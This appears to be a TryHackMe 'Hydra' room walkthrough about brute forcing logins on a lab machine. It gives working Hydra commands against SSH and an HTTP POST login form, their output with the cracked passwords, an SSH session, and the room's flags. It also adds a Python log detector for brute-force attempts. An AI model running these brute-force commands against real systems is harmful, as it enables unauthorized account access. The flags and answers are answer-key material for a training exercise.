THM: Hydra

Solution to the Hydra Room

Hydra Introduction

Hydra is a brute force online password cracking program, a quick system login password “hacking” tool.

Hydra can run through a list and “brute force” some authentication services. Imagine trying to manually guess someone’s password on a particular service (SSH, Web Application Form, FTP or SNMP) - we can use Hydra to run through a password list and speed this process up for us, determining the correct password.

According to its official repository, Hydra supports, i.e., has the ability to brute force the following protocols: “Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, TeamSpeak (TS2), Telnet, VMware-Auth, VNC and XMPP.”

For more information on the options of each protocol in Hydra, you can check the Kali Hydra tool page.

This shows the importance of using a strong password: if your password is common, contains no special characters and is not longer than eight characters, it is liable to be guessed. A one-hundred-million-password list contains the common passwords, so when an out-of-the-box application ships with an easy login password, change it from the default! CCTV cameras and web frameworks often use admin:password as the default login credentials, which is obviously not strong enough.

Installing Hydra

Hydra is already installed on the AttackBox. You can access it by clicking on the Start AttackBox button.

If you prefer to use the in-browser Kali machine, Hydra also comes pre-installed, as is the case with all Kali distributions. You can access it by selecting Use Kali Linux and clicking on the Start Kali Linux button.

If you prefer to use another Linux distribution, check its official package repositories. For instance, you can install Hydra on an Ubuntu or Fedora system by executing apt install hydra or dnf install hydra. Alternatively, you can download it from its official THC-Hydra repository.


Databases 101

Start the AttackBox by pressing the Start AttackBox button at the top of this page. The AttackBox machine will start in Split-Screen view. If it is not visible, use the blue Show Split View button at the top of the page.

Press the green Start Machine button below to deploy the machine attached to this task, then navigate to http://MACHINE_IP on the AttackBox (this machine can take up to 3 minutes to boot).

Hydra Commands

The options we pass into Hydra depend on which service (protocol) we’re attacking. For example, if we wanted to brute force FTP with the username being user and a password list being passlist.txt, we’d use the following command:

hydra -l user -P passlist.txt ftp://MACHINE_IP

For this deployed machine, here are the commands to use Hydra on SSH and a web form (POST method).

SSH

hydra -l <username> -P <full path to pass> MACHINE_IP -t 4 ssh

Option   Description
-l       specifies the (SSH) username for login
-P       indicates a list of passwords
-t       sets the number of threads to spawn

For example, hydra -l root -P passwords.txt MACHINE_IP -t 4 ssh will run with the following arguments:

  • Hydra will use root as the username for ssh
  • It will try the passwords in the passwords.txt file
  • There will be four threads running in parallel as indicated by -t 4

Post Web Form

We can use Hydra to brute force web forms too. You must know which type of request it is making; GET or POST methods are commonly used. You can use your browser’s network tab (in developer tools) to see the request types or view the source code.

sudo hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "<path>:<login_credentials>:<invalid_response>"

Option                Description
-l                    the username for (web form) login
-P                    the password list to use
http-post-form        the type of the form is POST
<path>                the login page URL, for example, login.php
<login_credentials>   the username and password used to log in, for example, username=^USER^&password=^PASS^
<invalid_response>    part of the response when the login fails
-V                    verbose output for every attempt

Below is a more concrete example Hydra command to brute force a POST login form:

hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

  • The login page is /, i.e., the root of the site at the machine's IP address
  • username is the form field where the username is entered
  • The specified username(s) will replace ^USER^
  • password is the form field where the password is entered
  • The provided passwords will replace ^PASS^
  • Finally, F=incorrect tells Hydra that a login attempt failed whenever the string incorrect appears in the server reply

You should now have enough information to put this into practice and brute force your credentials to the deployed machine!
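Defenders see the same activity from the other side: the SSH attempts described above land in sshd's auth log as repeated "Failed password" lines, and the POST-form attempts land in the web server's access log as a burst of POSTs to the login path from one source. The following added example (it is not part of the room and not Hydra's code) parses constructed samples of both log formats and flags any source that exceeds a failure threshold inside a sliding time window; the log formats, threshold and window are assumptions for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines; not captured from the room machine. The web server
# answers 200 to a failed form login (the "incorrect" text is only in the body), so
# on the web side the only signal in an access log is the rate of POSTs to /login.
SSHD_LOG = """\
Nov  6 19:40:01 web sshd[1201]: Failed password for molly from 10.8.11.98 port 50122 ssh2
Nov  6 19:40:01 web sshd[1202]: Failed password for molly from 10.8.11.98 port 50124 ssh2
Nov  6 19:40:02 web sshd[1203]: Failed password for molly from 10.8.11.98 port 50126 ssh2
Nov  6 19:41:30 web sshd[1300]: Failed password for admin from 10.8.22.7 port 40000 ssh2
"""
WEB_LOG = """\
10.8.11.98 - - [06/Nov/2025:19:45:01 +0000] "POST /login HTTP/1.1" 200 512
10.8.11.98 - - [06/Nov/2025:19:45:01 +0000] "POST /login HTTP/1.1" 200 512
10.8.11.98 - - [06/Nov/2025:19:45:02 +0000] "POST /login HTTP/1.1" 200 512
10.8.22.7 - - [06/Nov/2025:19:45:09 +0000] "GET /login HTTP/1.1" 200 1024
"""

# Line patterns for syslog-style sshd failures and combined-format access logs.
SSHD_RE = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
                     r"Failed password for (?:invalid user )?\S+ from (?P<src>\S+)", re.M)
WEB_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\] ]+) [^\]]*\] "POST /login ', re.M)

def parse_events(text, regex, fmt, year=2025):
    """Return (timestamp, source_ip) for every line in text that regex matches."""
    events = []
    for m in regex.finditer(text):
        ts = datetime.strptime(m.group("ts"), fmt)
        if ts.year == 1900:          # syslog lines carry no year; assume the given one
            ts = ts.replace(year=year)
        events.append((ts, m.group("src")))
    return events

def brute_force_sources(events, threshold=3, window=timedelta(seconds=60)):
    """Map source_ip -> peak event count inside any sliding window, for sources
    whose peak reached threshold. Events need not be pre-sorted."""
    by_src = defaultdict(list)
    for ts, src in sorted(events):
        by_src[src].append(ts)
    flagged = {}
    for src, times in by_src.items():
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # drop events older than the window
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[src] = peak
    return flagged
```

Run the two detectors separately (one per log source), for example brute_force_sources(parse_events(SSHD_LOG, SSHD_RE, "%b %d %H:%M:%S")); a single source tripping both is a strong sign of the credential spraying this room demonstrates.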

Answer the questions

Use Hydra to bruteforce molly's web password. What is flag 1?

```http
POST /login HTTP/1.1
Host: 10.10.10.37
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://10.10.10.37
Connection: keep-alive
Referer: http://10.10.10.37/login
Cookie: connect.sid=s%3AFVEi0bjSoX_fJjN2WhwZafXlR-BwbZ8C.1eQqAOZiOkGgygqahjWLyMm7tsQ4%2B8e0lxOi%2FzPlPyY
Upgrade-Insecure-Requests: 1
Priority: u=0, i

username=test&password=test
```

```bash
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.10.37 http-post-form "/login:username=^USER^&password=^PASS^:F=Your username or password is incorrect." -V

[80][http-post-form] host: 10.10.10.37   login: molly   password: sunshine
```

Log in with the username molly and the password sunshine.

Answer: THM{2673a7dd116de68e85c48ec0b1f2612e}

Use Hydra to bruteforce molly's SSH password. What is flag 2?

```bash
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.10.37 ssh -V

[22][ssh] host: 10.10.10.37   login: molly   password: butterfly
```

```bash
root@ip-10-10-248-245:~# ssh molly@10.10.10.37
The authenticity of host '10.10.10.37 (10.10.10.37)' can't be established.
ECDSA key fingerprint is SHA256:Scw1XWMoNZnVgd90MF4TaLxeZqu/Ejai2O0jcxL+Ihs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.37' (ECDSA) to the list of known hosts.
molly@10.10.10.37's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-1083-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Thu 06 Nov 2025 07:50:07 PM UTC

  System load:  0.0                Processes:             135
  Usage of /:   18.6% of 14.47GB   Users logged in:       0
  Memory usage: 19%                IPv4 address for ens5: 10.10.10.37
  Swap usage:   0%

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

7 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Dec 17 14:37:49 2019 from 10.8.11.98
molly@ip-10-10-10-37:~$ ls
flag2.txt
molly@ip-10-10-10-37:~$ cat flag2.txt 
THM{c8eeb0468febbadea859baeb33b2541b}
```

Answer: THM{c8eeb0468febbadea859baeb33b2541b}